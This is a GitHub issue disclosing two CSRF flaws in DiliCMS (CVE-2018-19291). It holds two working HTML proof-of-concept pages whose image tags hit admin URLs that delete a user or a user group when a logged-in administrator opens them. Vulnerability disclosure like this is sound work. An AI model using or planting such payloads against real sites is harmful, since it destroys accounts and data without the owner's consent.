Skip to content
This repository has been archived by the owner on Jan 10, 2019. It is now read-only.

There is two CSRF vulnerability that can delete user or usergroup #60

Open
Rich4ever opened this issue Nov 11, 2018 · 1 comment
Open

There is two CSRF vulnerability that can delete user or usergroup #60

Rich4ever opened this issue Nov 11, 2018 · 1 comment

Comments

@Rich4ever
Copy link

Software Link : https://github.com/chekun/DiliCMS
After the administrator logged in,open the page
test.html delete user POC:

<html>  
  <body>
    <img src="http://127.0.0.1/DiliCMS/admin/index.php/user/del/1" />
</body>
</html>

test2.html delete group POC:

  <body>
    <img src="http://127.0.0.1/DiliCMS/admin/index.php/role/del/2" />
</body>
</html>
@fgeek
Copy link

fgeek commented Nov 16, 2018

Please use https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19291 for this vulnerability.

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@fgeek @Rich4ever